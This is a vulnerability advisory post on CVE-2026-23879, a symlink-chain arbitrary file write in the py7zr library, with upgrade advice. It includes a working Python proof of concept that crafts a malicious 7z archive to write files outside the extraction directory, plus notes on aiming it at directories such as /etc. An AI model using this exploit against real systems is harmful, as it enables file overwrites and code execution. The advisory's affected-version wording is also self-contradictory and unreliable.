Listen to this Post
CVE-2026-23879 is an arbitrary file write vulnerability discovered in the py7zr Python library, specifically affecting version 1.1.0 and all earlier versions up to 1.1.2. The root cause is the library’s failure to properly validate and restrict the targets of symbolic links when extracting a 7z archive using the `extractall()` method. During extraction, the library checks the link’s arcname against the destination directory but does not resolve the full, combined path of a symbolic link chain. This oversight allows an attacker to create a malicious 7z archive containing a chain of symbolic links that ultimately points outside the intended extraction directory, for example, to the system root directory. When a regular file is subsequently extracted through this chain, it is written to the attacker-controlled arbitrary path, bypassing directory boundary restrictions. This can lead to severe consequences including remote code execution, privilege escalation, data corruption, or denial of service. The vulnerability is fixed in py7zr version 1.1.3.
DailyCVE Form
Platform: py7zr library
Version: <=1.1.2
Vulnerability: Arbitrary file write
Severity: High
date: 2026-06-19
Prediction: Patch available (1.1.3)
What Undercode Say
Analytics of the vulnerability reveal a classic path traversal weakness, CWE-29: Path Traversal: ‘..\filename’. The vulnerability is triggered during the extraction process, specifically within the `SevenZipFile.extractall()` function.
The following bash command can be used to check the installed version of py7zr, which is crucial for determining if a system is vulnerable:
pip show py7zr | grep Version
The following Python code demonstrates the vulnerable logic by creating a malicious archive and then extracting it, leading to arbitrary file write:
import py7zr
import os
import sys
def create_malicious_archive(output_dir: str):
filename = "archive.7z"
file_path = os.path.join(output_dir, filename)
with py7zr.SevenZipFile(file_path, 'w') as archive:
archive.writestr("Some Text", "dir0/someFile.txt")
Create a chain of symbolic links to traverse out of the target directory
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir1", "dir0/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir2", "dir1/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir3", "dir2/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir4", "dir3/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir5", "dir4/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir6", "dir5/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir7", "dir6/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "dir8", "dir7/..")
archive.writestr({"type": py7zr.ArchiveFile.SYMLINK}, "myTmp", "dir8/tmp")
Write a file that will be placed at the final symlink target
archive.writestr("Malicious Text\n", "myTmp/poc.txt")
def extract_archive(seven_path, output_dir):
os.makedirs(output_dir, exist_ok=True)
with py7zr.SevenZipFile(seven_path, mode='r') as z:
z.extractall(path=output_dir)
print(f"Extracted '{seven_path}' to '{output_dir}'")
if <strong>name</strong> == "<strong>main</strong>":
create_malicious_archive(".")
extract_archive("archive.7z", "extracted_output")
This script, when executed, will create an `archive.7z` file. Extracting it will create a symlink chain that points to /tmp, and the `poc.txt` file will be written to /tmp/poc.txt, demonstrating the arbitrary file write.
Exploit
An attacker can exploit this vulnerability by crafting a malicious 7z archive. The archive must contain a chain of symbolic links where each link points to a parent directory (e.g., `dir1` -> dir0/.., `dir2` -> dir1/.., etc.). The final link in the chain points to a sensitive directory on the target system, such as `/tmp` or /etc. The archive also contains a regular file that is written through this chain of symbolic links. When a victim extracts this archive using a vulnerable version of py7zr, the symbolic links are restored, and the regular file is written to the attacker-specified location outside the intended extraction directory. The exploit is reliable and does not require user interaction beyond extracting the malicious archive.
Protection
The primary protection against CVE-2026-23879 is to upgrade py7zr to a patched version. The vulnerability is fixed in py7zr version 1.1.3 and later. Users can upgrade using the following pip command:
pip install --upgrade py7zr
For environments where immediate upgrading is not possible, it is advised to avoid extracting 7z archives from untrusted sources. Additionally, system administrators can implement monitoring and detection rules to identify attempts to create or extract archives with suspicious symbolic link chains.
Impact
Successful exploitation of this vulnerability allows an attacker to write arbitrary files to any location on the host file system that the extracting process has permissions to write. This can have several critical impacts:
Remote Code Execution (RCE): By writing a malicious file to a location like a web directory, startup folder, or cron job, an attacker can achieve code execution on the target system.
Privilege Escalation: Overwriting system binaries or configuration files can lead to privilege escalation.
Data Corruption or Loss: An attacker could overwrite critical system or application data, leading to data corruption or denial of service.
System Compromise: The ability to write arbitrary files is a fundamental step toward full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
